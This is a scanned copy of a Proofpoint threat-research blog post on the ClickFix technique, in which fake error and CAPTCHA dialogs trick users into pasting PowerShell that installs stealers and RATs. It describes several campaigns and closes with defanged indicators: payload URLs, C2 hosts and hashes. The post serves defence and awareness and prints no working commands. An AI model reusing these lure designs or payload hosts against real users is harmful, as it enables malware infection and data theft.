www.proofpoint.com
Open in
urlscan Pro
2a02:e980:107::cf
Public Scan
URL:
https://www.proofpoint.com/us/blog/threat-insight/security-brief-clickfix-social-engineering-technique-floods-threat-landscape
Submission: On November 19 via api from TR — Scanned from DE
Submission: On November 19 via api from TR — Scanned from DE
Form analysis 4 forms found in the DOM
<form class="header-nav__search-form">
<input type="text" class="header-nav__search-input" placeholder="">
<input type="submit" class="header-nav__search-button" val="Search">
</form><form id="mktoForm_19277" data-mkto-id="19277" data-mkto-base="//app-abj.marketo.com" data-munchkin-id="309-RHV-619" data-submit-text="" data-redirect-link="" data-prefill="" data-event-label="" data-lang-code="us" data-validate-email="1"
class="mk-form__form marketo-form-block__form mktoForm mktoHasWidth mktoLayoutLeft js-visible mkto-form-processed" data-asset-type="Blogs Subscribe" novalidate="novalidate"
style="font-family: inherit; font-size: 16px; color: rgb(51, 51, 51); width: 1601px;">
<style type="text/css"></style>
<div class="mktoFormRow">
<div class="mktoFieldDescriptor mktoFormCol" style="margin-bottom: 5px;">
<div class="mktoOffset" style="width: 5px;"></div>
<div class="mktoFieldWrap mktoRequiredField"><label for="Email" id="LblEmail" class="mktoLabel mktoHasWidth" style="width: 150px;">
<div class="mktoAsterix">*</div>Business Email:
</label>
<div class="mktoGutter mktoHasWidth" style="width: 5px;"></div><input id="Email" name="Email" placeholder="Business Email *" maxlength="255" aria-labelledby="LblEmail InstructEmail" type="email"
class="mktoField mktoEmailField mktoHasWidth mktoRequired" aria-required="true" style="width: 200px;"><span id="InstructEmail" tabindex="-1" class="mktoInstruction"></span>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="blogInterest" class="mktoField mktoFieldDescriptor mktoFormCol" value="All Blog Posts" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Employees_Picklist__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="State" class="mktoField mktoFieldDescriptor mktoFormCol" value="State/Province" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Most_Recent_Medium__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="Website" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Most_Recent_Medium_Detail__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="www-pfpt" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Industry" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Website" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="AnnualRevenue" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="demandbasesid" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="demandBase_Data_Source" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Primary_Product_Interest__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="UTM_Post_ID__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="utmcampaign" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="utmterm" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="db_employee_count" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Unsubscribed" class="mktoField mktoFieldDescriptor mktoFormCol" value="0" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoButtonRow"><span class="mktoButtonWrap mktoNative" style="margin-left: 110px;"><button type="submit" class="mktoButton">Submit</button></span></div><input type="hidden" name="formid" class="mktoField mktoFieldDescriptor"
value="19277" placeholder=""><input type="hidden" name="munchkinId" class="mktoField mktoFieldDescriptor" value="309-RHV-619" placeholder=""><input type="hidden" name="Website_Conversion_URL__c" class="mktoField mktoFieldDescriptor"
value="https://www.proofpoint.com/us/blog/threat-insight/security-brief-clickfix-social-engineering-technique-floods-threat-landscape" placeholder=""><input type="hidden" name="gAClientID" class="mktoField mktoFieldDescriptor"
value="1464159981.1732029339" placeholder="">
<style type="text/css"></style>
<div class="mktoFormRow">
<div class="mktoFieldDescriptor mktoFormCol" style="margin-bottom: 5px;">
<div class="mktoOffset" style="width: 5px;"></div>
<div class="mktoFieldWrap mktoRequiredField"><label for="Email" id="LblEmail" class="mktoLabel mktoHasWidth" style="width: 150px;">
<div class="mktoAsterix">*</div>Business Email:
</label>
<div class="mktoGutter mktoHasWidth" style="width: 5px;"></div><input id="Email" name="Email" placeholder="Business Email *" maxlength="255" aria-labelledby="LblEmail InstructEmail" type="email"
class="mktoField mktoEmailField mktoHasWidth mktoRequired" aria-required="true" style="width: 200px;"><span id="InstructEmail" tabindex="-1" class="mktoInstruction"></span>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="blogInterest" class="mktoField mktoFieldDescriptor mktoFormCol" value="All Blog Posts" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Employees_Picklist__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="State" class="mktoField mktoFieldDescriptor mktoFormCol" value="State/Province" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Most_Recent_Medium__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="Website" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Most_Recent_Medium_Detail__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="www-pfpt" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Industry" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Website" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="AnnualRevenue" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="demandbasesid" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="demandBase_Data_Source" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Primary_Product_Interest__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="UTM_Post_ID__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="utmcampaign" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="utmterm" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="db_employee_count" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Unsubscribed" class="mktoField mktoFieldDescriptor mktoFormCol" value="0" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoButtonRow"><span class="mktoButtonWrap mktoNative" style="margin-left: 110px;"><button type="submit" class="mktoButton">Submit</button></span></div>
</form><form data-mkto-id="19277" data-mkto-base="//app-abj.marketo.com" data-munchkin-id="309-RHV-619" data-submit-text="" data-redirect-link="" data-prefill="" data-event-label="" data-lang-code="us" data-validate-email="1"
class="mk-form__form marketo-form-block__form mktoForm mktoHasWidth mktoLayoutLeft" data-asset-type="Blogs Subscribe" novalidate="novalidate"
style="font-family: inherit; font-size: 16px; color: rgb(51, 51, 51); visibility: hidden; position: absolute; top: -500px; left: -1000px; width: 1600px;"></form><form data-mkto-id="19277" data-mkto-base="//app-abj.marketo.com" data-munchkin-id="309-RHV-619" data-submit-text="" data-redirect-link="" data-prefill="" data-event-label="" data-lang-code="us" data-validate-email="1"
class="mk-form__form marketo-form-block__form mktoForm mktoHasWidth mktoLayoutLeft js-visible mkto-form-processed" data-asset-type="Blogs Subscribe" novalidate="novalidate"
style="font-family: inherit; font-size: 16px; color: rgb(51, 51, 51); width: 1600px; visibility: hidden; position: absolute; top: -500px; left: -1000px;"></form>Text Content
Skip to main content English (Americas) Search Login * Platform * Products * Solutions Proofpoint Contact Search * Platform * Products * Solutions * Partners * Resources * Company Search Login English (Americas) Platform Products Solutions Partners Resources Company Protect People Multi-layered, adaptive defenses for threat detection, impersonation, and supplier risk. Email Security Impersonation Protection More products Defend Data Transform your information protection with a human-centric, omni-channel approach. Enterprise DLP Adaptive Email DLP Insider Threat Management Intelligent Compliance Mitigate Human Risk Unlock full user risk visibility and drive behavior change. Security Awareness Augment Your Capabilities Managed Services Product Packages More Protect People Products Account Take-Over and Identity Protection Secure vulnerable identities, stop lateral movement and privilege escalation. Adaptive Email Security Stop more threats with a fully integrated layer of behavioral AI. Secure Email Relay Secure your application email and accelerate DMARC implementation Solutions by Use Case How Proofpoint protects your people and data. Authenticate Your Email Protect your email deliverability with DMARC. Combat Email and Cloud Threats Protect your people from email and cloud threats with an intelligent and holistic approach. More use cases Solutions by Industry People-centric solutions for your organization. Federal Government Cybersecurity for federal government agencies. State and Local Government Protecting the public sector, and the public from cyber threats. More industries Comparing Proofpoint Evaluating cybersecurity vendors? Check out our side-by-side comparisons. View comparisons SOLUTIONS BY USE CASE How Proofpoint protects your people and data. Change User Behavior Help your employees identify, resist and report attacks before the damage is done. Combat Data Loss and Insider Risk Prevent data loss via negligent, compromised and malicious insiders. Modernize Compliance and Archiving Manage risk and data retention needs with a modern compliance and archiving solution. Protect Cloud Apps Keep your people and their cloud apps secure by eliminating threats and data loss. Prevent Loss from Ransomware Learn about this growing threat and stop attacks by securing ransomware's top vector: email. Secure Microsoft 365 Implement the best security and compliance solution for Microsoft 365. SOLUTIONS BY INDUSTRY People-centric solutions for your organization. Higher Education A higher level of security for higher education. Financial Services Eliminate threats, build trust and foster growth for your organization. Healthcare Protect clinicians, patient data, and your intellectual property against advanced threats. Mobile Operators Make your messaging environment a secure environment. Internet Service Providers Cloudmark email protection. Small and Medium Businesses Big-time security for small business. PROOFPOINT VS. THE COMPETITION Side-by-side comparisons. Proofpoint vs. Abnormal Security Proofpoint vs. Mimecast Proofpoint vs. Cisco Proofpoint vs Microsoft Proofpoint vs. Microsoft Purview Proofpoint vs. Legacy DLP PARTNERS Deliver Proofpoint solutions to your customers. Channel Partners Archive Extraction Partners Learn about Extraction Partners. GSI and MSP Partners Learn about our global consulting. Technology and Alliance Partners Learn about our relationships. Social Media Protection Partners Learn about the technology and.... Proofpoint Essentials Partner Programs Small Business Solutions . Become a Channel Partner RESOURCES Find reports, webinars, blogs, events, podcasts and more. Resource Library Blog Keep up with the latest news and happenings. Webinars Browse our webinar library to learn about the latest threats, trends and issues in cybersecurity. Cybersecurity Academy Earn your certification to become a Proofpoint Certified Guardian. Podcasts Learn about the human side of cybersecurity. New Perimeters Magazine Get the latest cybersecurity insights in your hands. Threat Glossary Learn about the latest security threats. Events Connect with us at events to learn how to protect your people and data from ever-evolving threats. Customer Stories Read how our customers solve their most pressing cybersecurity challenges. COMPANY Proofpoint protects organizations' greatest assets and biggest risks: their people. About Proofpoint Why Proofpoint Learn about our unique people-centric approach to protection. Careers Stand out and make a difference at one of the world's leading cybersecurity companies. News Center Read the latest press releases, news stories and media highlights about Proofpoint. Privacy and Trust Learn about how we handle data and make commitments to privacy and other regulations. Environmental, Social, and Governance Learn how we apply our principles to positively impact our community. Support Access the full range of Proofpoint support services. PLATFORM Discover the Proofpoint human-centric platform. Learn More Proofpoint Nexus Detection technologies to protect people and defend data. Proofpoint Zen Protect and engage users wherever they work. Search Proofpoint Try searching for Email Security Phishing DLP Email Fraud Select Product Login * Support Log-in * Proofpoint Cybersecurity Academy * Digital Risk Portal * Email Fraud Defense * ET Intelligence * Proofpoint Essentials * Sendmail Support Log-in Select Language * English (Americas) * English (Europe, Middle East, Africa) * English (Asia-Pacific) * Español * Deutsch * Français * Italiano * Português * 日本語 * 한국어 Blog Threat Insight Security Brief: ClickFix Social Engineering Technique Floods Threat Landscape SECURITY BRIEF: CLICKFIX SOCIAL ENGINEERING TECHNIQUE FLOODS THREAT LANDSCAPE Share with your network! November 18, 2024 Tommy Madjar, Selena Larson and The Proofpoint Threat Research Team WHAT HAPPENED Proofpoint researchers have identified an increase in a unique social engineering technique called ClickFix. And the lures are getting even more clever. Initially observed earlier this year in campaigns from initial access broker TA571 and a fake update website compromise threat cluster known as ClearFake, the ClickFix technique that attempts to lure unsuspecting users to copy and run PowerShell to download malware is now much more popular across the threat landscape. The ClickFix social engineering technique uses dialogue boxes containing fake error messages to trick people into copying, pasting, and running malicious content on their own computer. Example of early ClickFix technique used by ClearFake. Proofpoint has observed threat actors impersonating various software and services using the ClickFix technique as part of their social engineering, including common enterprise software such as Microsoft Word and Google Chrome, as well as software specifically observed in target environments such as transportation and logistics. The ClickFix technique is used by multiple different threat actors and can originate via compromised websites, documents, HTML attachments, malicious URLs, etc. In most cases, when directed to the malicious URL or file, users are shown a dialog box that suggests an error occurred when trying to open a document or webpage. This dialog box includes instructions that appear to describe how to “fix” the problem, but will either: automatically copy and paste a malicious script into the PowerShell terminal, or the Windows Run dialog box, to eventually run a malicious script via PowerShell; or provide a user with instructions on how to manually open PowerShell and copy and paste the provided command. Proofpoint has observed ClickFix campaigns leading to malware including AsyncRAT, Danabot, DarkGate, Lumma Stealer, NetSupport, and more. ClickFix campaigns observed March through October 2024. Notably, threat actors have been observed recently using a fake CAPTCHA themed ClickFix technique that pretends to validate the user with a "Verify You Are Human" (CAPTCHA) check. Much of the activity is based on an open source toolkit named reCAPTCHA Phish available on GitHub for “educational purposes.” The tool was released in mid-September by a security researcher, and Proofpoint began observing it in email threat data just days later. The purpose of the repository was to demonstrate a similar technique used by threat actors since August 2024 on websites related to video streaming. Ukraine CERT recently published details on a suspected Russian espionage actor using the fake CAPTCHA ClickFix technique in campaigns targeting government entities in Ukraine. RECENT EXAMPLES GITHUB “SECURITY VULNERABILITY” NOTIFICATIONS On 18 September 2024, Proofpoint researchers identified a campaign using GitHub notifications to deliver malware. The messages were notifications for GitHub activity. The threat actor either commented on or created an issue in a GitHub repository. If the repository owner, issue owner, or other relevant collaborators had email notifications enabled, they received an email notification containing the content of the comment or issue from GitHub. This campaign was publicly reported by security journalist Brian Krebs. Email from GitHub. The notification impersonated a security warning from GitHub and included a link to a fake GitHub website. The fake website used the reCAPTCHA Phish and ClickFix social engineering technique to trick users into executing a PowerShell command on their computer. ClickFix style “verification steps” to execute PowerShell. The landing page contained a fake reCAPTCHA message at the end of the copied command so the target would not see the actual malicious command in the run-box when the malicious command was pasted. If the user performed the requested steps, PowerShell code was executed to download an executable that led to the installation of Lumma Stealer. The activity impacted at least 300 organizations globally, according to Proofpoint visibility. SWISS TARGETED CLICKFIX DELIVERS MALWARE Proofpoint has observed actors using the reCAPTCHA ClickFix technique in multiple languages targeting organizations globally. In September 2024, researchers identified a German language campaign targeting Swiss organizations using ClickFix with the fake CAPTCHA. The messages impersonated the Swiss e-commerce marketplace Ricardo and contained URLs. When clicked, the users were directed to a landing page using the reCAPTCHA phish tool. The page instructed the user to click to copy and paste to resolve an issue. However, this actually ran JavaScript that downloaded a ZIP file from a Dropbox URL. Then, copyToClipboard was executed which invoked PowerShell to unzip and launch the BAT file embedded in the ZIP. At the time of analysis, researchers were unable to identify the dropped malware, but based on C2 traffic assessed the payload was likely AsyncRAT or PureLog Stealer. Screenshot of fake Ricardo site containing “ClickFix” instructions. FAKE SOFTWARE UPDATES DELIVER NETSUPPORT RAT On 5 September 2024, researchers identified a NetSupport campaign that used “benign” email messages to instruct users to copy and paste PowerShell into their terminal. The emails did not contain any malicious links or attachments, simply instructions. The emails masqueraded as security updates, for example: From: Security Agent <resizenreyl6@web[.]de> Subject: Important Software Update: Action Required. These messages contained instructions to manually run an encoded PowerShell command to update the allegedly insecure software. (The supposedly unsafe software was never named – just “software”.) Copy and paste PowerShell lure. If the PowerShell command was executed, it executed a remote PowerShell script. This second PowerShell script downloaded 7zip and a password-protected 7z file. It then used 7zip to extract the 7z file with the password "fJgGDNG_yudnt4YBJtYJfnJ" and ran NetSupport. While it’s more common to see the ClickFix technique used with automatic copy and paste functions, the instructions requiring more manual work on the part of the user are also common. However, it is likely the variant requiring more manual work on the part of the user is less effective, as users may be more hesitant about manually copying and running encoded PowerShell. HTML ATTACHMENTS TO BRUTE RATEL C4 AND LATRODECTUS On 20 September 2024, Proofpoint researchers identified a campaign delivering Brute Ratel C4 and Latrodectus. Messages came from various senders and subjects referencing business themes including budget, finance, invoice, documents, shipping, etc. and contained HTML attachments. Filenames started with “Report_” or “scan_doc_” subsequently followed by randomized numeric characters. When opened, the HTML attachment displayed a dialogue box with instructions that varied slightly depending on the filename. But both contained a button for users to click – either “Solution” or How to fix”. HTML files containing ClickFix instructions. Examples for attachments named “Report_” (on the left) and “scan_doc_” (on the right). When clicked, base64 encoded PowerShell was copied, and the user was presented with another dialogue box that instructed the user to open Run, paste, and execute the command. The PowerShell command was used to download a DLL which started Brute Ratel. Brute Ratel was observed leading to Latrodectus. Instructions to get a user to paste and run PowerShell. The attack chain used in this campaign and the resulting dialog box was notably different than previously observed variants. The sample observed in this campaign attempted to evade analysts by reversing strings in the HTML body of the webpage. While this attack chain and resulting payload delivery overlapped with previously observed TA571 and TA578 campaigns, Proofpoint researchers do not attribute this activity with high confidence to a known threat actor. CHATGPT MALVERTISING DELIVERS XWORM In mid-October 2024, researchers observed malvertising using ChatGPT themed lures to deliver XWorm via the ClickFix technique. The malicious website was observed being distributed via Outbrain chumboxes on a large tech site with the text “Unlock the Power of ChatGPT”. It contained an attacker-owned domain “promtcraft[.]online” claiming to be an LLM prompt generator PromtCraft. The advertisement was likely running on multiple media outlets given Outbrain’s ad distribution. When clicked, the linked domain displayed a customized version of the open source reCAPTCHA phish tool, which had a lure encouraging visitors to join a ChatGPT community, with the ClickFix clipboard payload. ChatGPT impersonation used in ClickFix payload delivery. If the clipboard payload was executed, MSHTA was executed to run the HTA script in a HTML file obfuscated with ProtWare HTML Guardian Personal Edition, causing MSHTA to call two different remote PowerShell scripts. The first script will use RegAsm to run XWorm encoded in a Base64 variable, which will run the HVNC plugin to allow full access to the computer. The second script used RegAsm to run an executable encoded in a Base64 variable. This executable was created with SharpHide which was used to create a hidden registry key to run the first XWorm PowerShell script at each boot. Notably, in addition to a different visual template than the original reCAPTCHA phish, the JavaScript on the malicious site contained Russian comments, likely generated by an LLM explaining the code. Suspected LLM generated JavaScript to display the reCAPTCHA phish. SUSPECTED UAC-0050 TARGETS UKRAINE On 31 October 2024, Proofpoint researchers identified a Ukrainian language campaign purporting to be emails sharing documents or requested information with the recipient. Emails targeted organizations in Ukraine. Messages contained compressed HTML attachments which, if executed, presented a web page with a lure using the reCAPTCHA phish ClickFix technique. If the user copied and pasted the PowerShell script as instructed, it executed a second PowerShell script which used Bits transfer to download and run a malicious payload, suspected to be Lucky Volunteer. Lucky Volunteer is a rarely observed information stealing payload previously identified in a March 2023 TA579 campaign in which AresLoader dropped Lucky Volunteer. Ukrainian language lure purporting to be related to alleged information requested. Notably, this activity used an English-language reCAPTCHA phish ClickFix landing page, despite the email content and attachment names written in Ukrainian. Proofpoint assesses the campaign overlaps with activity attributed to UAC-0050. ATTRIBUTION The ClickFix technique was first prominently observed in Proofpoint data used by TA571 and ClearFake, however it is now used by several unattributed threat clusters, including a sophisticated cybercrime activity set that specifically targets transportation and logistics firms with customized ClickFix lures. Proofpoint previously referred to a cluster of web inject activity using this technique as "ClickFix." However, after widespread use of the technique observed in Proofpoint data and third-party reporting, Proofpoint refers to the technique as ClickFix, and the activity is not all attributed to the original cluster of activity. This activity was distinctly separate from the ClearFake threat cluster, although some activity did overlap. It is possible the activity is all attributable to ClearFake, which Proofpoint has not observed since August 2024. Most observed ClickFix campaigns are not attributed to a known threat actor or group. The campaigns observed in Proofpoint data mostly appear to have financially motivated objectives. WHY IT MATTERS The ClickFix technique is growing in popularity and is being used by many financially motivated threat actors, as well as reportedly by suspected espionage-focused groups. Given the widespread adoption, it is likely this technique is very effective. What’s insidious about this technique is the adversaries are preying on people’s innate desire to be helpful and independent. By providing what appears to be both a problem and a solution, people feel empowered to “fix” the issue themselves without needing to alert their IT team or anyone else, and it bypasses security protections by having the person infect themselves. But this innovation in social engineering is a direct result of people getting better at protecting themselves online. Macros are less likely to work, invoice lures are suspicious, unsolicited links or attachments with clearly malicious content will get blocked by security mechanisms. So, hackers have to get creative, and focus their efforts more on hacking people’s brains, emotions, and behaviors via crafty social engineering so they can keep installing malware. As users get smarter and remain vigilant about the ways adversaries are trying to gain initial access, hackers respond by trying a lot of different techniques to see what works best. Organizations should train users on this technique specifically to prevent exploitation. EXAMPLE INDICATORS OF COMPROMISE Indicator Description First Observed hxxps://github-scanner[.]com/l6E.exe Lumma Stealer Payload URL 18 September 2024 d9ab6cfa60cc75785e31ca9b5a31dae1c33022bdb90cb382ef3ca823c627590d Lumma Stealer SHA256 18 September 2024 d737637ee5f121d11a6f3295bf0d51b06218812b5ec04fe9ea484921e905a207 Lumma Stealer SHA256 18 September 2024 eemmbryequo[.]shop Lumma Stealer C2 18 September 2024 reggwardssdqw[.]shop Lumma Stealer C2 18 September 2024 relaxatinownio[.]shop Lumma Stealer C2 18 September 2024 tesecuuweqo[.]shop Lumma Stealer C2 18 September 2024 tendencctywop[.]shop Lumma Stealer C2 18 September 2024 licenseodqwmqn[.]shop Lumma Stealer C2 18 September 2024 keennylrwmqlw[.]shop Lumma Stealer C2 18 September 2024 hxxps://steamcommunity[.]com/profiles/76561199724331900 Lumma Stealer C2 18 September 2024 hxxps://ricardo[.]aljiri[.]es/ricardo/captchaV4DE/ Payload URL 25 September 2024 hxxps://www[.]dropbox[.]com/scl/fi/z4vwx6uot2bwugh34fbvz/Captcha_V4ID882994ft[.]zip?rlkey=nuh8s42xr9mz2kzkonzwyseaa&st=vk2qu0te&dl=1 Payload URL 25 September 2024 185[.]91[.]69[.]119 Suspected AsyncRAT C2 25 September 2024 5d5b4f259ef3b3d20f6ef1a63def6dee9326efe2b7b7b7e474008aa978f1f19b Suspected AsyncRAT SHA256 25 September 2024 e726d3324ca8b9a8da4d317c5d749dd0ad58fd447a2eb5eee75ef14824339cd5 Suspected AsyncRAT SHA256 25 September 2024 Greshunka[.]com BruteRatel C2 20 September 2024 Tiguanin[.]com BruteRatel C2 20 September 2024 Bazarunet[.]com BruteRatel C2 20 September 2024 92[.]118[.]112[.]130 BruteRatel C2 20 September 2024 193[.]124[.]185[.]116 BruteRatel C2 20 September 2024 193[.]124[.]185[.]117 BruteRatel C2 20 September 2024 hxxp://188[.]119[.]113[.]152/x64_stealth[.]dll PowerShell Payload 20 September 2024 rilomenifis[.]com Latrodectus C2 20 September 2024 isomicrotich[.]com Latrodectus C2 20 September 2024 promptcraft[.]online Malicious Domain 19 October 2024 hxxp://185[.]147[.]124[.]40/Capcha[.]html ClickFix Clipboard Payload 19 October 2024 185[.]147[.]124[.]40:4404 XWorm C2 19 October 2024 hxxp://31[.]214[.]157[.]49/A6DxMijz_hdKR2Jol_PIMar1Q8[.]txt URL to Suspected Lucky Volunteer 31 October 2024 hxxp://31[.]214[.]157[.]49/chrome[.]zip URL to Suspected Lucky Volunteer 31 October 2024 hxxp://178[.]215[.]224[.]252/v10/ukyh[.]php Suspected Lucky Volunteer C2 31 October 2024 Previous Blog Post SUBSCRIBE TO THE PROOFPOINT BLOG * Business Email: Submit * Business Email: Submit Products * Protect People * Defend Data * Mitigate Human Risk * Premium Services Get Support * Product Support Login * Support Services * IP Address Blocked? Connect with Us * +1-408-517-4710 * Attend an Event * Contact Us * Free Demo Request More * About Proofpoint * Why Proofpoint * Careers * Leadership Team * News Center * Privacy and Trust © 2024. All rights reserved. Terms and conditions Privacy Policy Sitemap * * * * *